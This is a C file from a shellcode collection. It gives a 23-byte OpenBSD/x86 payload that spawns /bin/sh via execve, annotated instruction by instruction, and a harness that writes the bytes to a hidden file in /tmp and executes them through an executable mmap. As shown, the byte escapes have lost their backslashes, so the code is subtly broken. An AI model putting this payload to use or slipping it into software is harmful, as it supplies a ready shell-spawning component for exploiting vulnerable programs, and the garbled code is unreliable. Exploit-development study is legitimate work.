/* * [OpenBSD/x86] * Shellcode for: execve("/bin/sh", ["/bin/sh"], NULL) * 23 bytes * hophet [at] gmail.com * http://www.nlabs.com.br/~hophet/ * * Fancy mappings by iruata souza (muzgo) * iru.muzgo!gmail.com * http://openvms-rocks.com/~muzgo/ */ #include <sys/types.h> #include <sys/stat.h> #include <sys/mman.h> #include <err.h> #include <fcntl.h> #include <stdio.h> #include <string.h> #include <unistd.h> char shellcode[] = "x99" /* cltd */ "x52" /* push %edx */ "x68x6ex2fx73x68" /* push $0x68732f6e */ "x68x2fx2fx62x69" /* push $0x69622f2f */ "x89xe3" /* mov %esp,%ebx */ "x52" /* push %edx */ "x54" /* push %esp */ "x53" /* push %ebx */ "x53" /* push %ebx */ "x6ax3b" /* push $0x3b */ "x58" /* pop %eax */ "xcdx80"; /* int $0x80 */ /* * Since shellcode above will be mapped in .rodata (read-only protection), * we need to write it to a file and map the file with PROT_EXEC in order * to execute it. */ int main(void) { void (*p)(); int fd; fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); if(fd < 0) err(1, "open"); write(fd, shellcode, strlen(shellcode)); if((lseek(fd, 0L, SEEK_SET)) < 0) err(1, "lseek"); p = (void (*)())mmap(NULL, strlen(shellcode), PROT_READ|PROT_EXEC, NULL, fd, NULL); if (p == (void (*)())MAP_FAILED) err(1, "mmap"); p(); return 0; }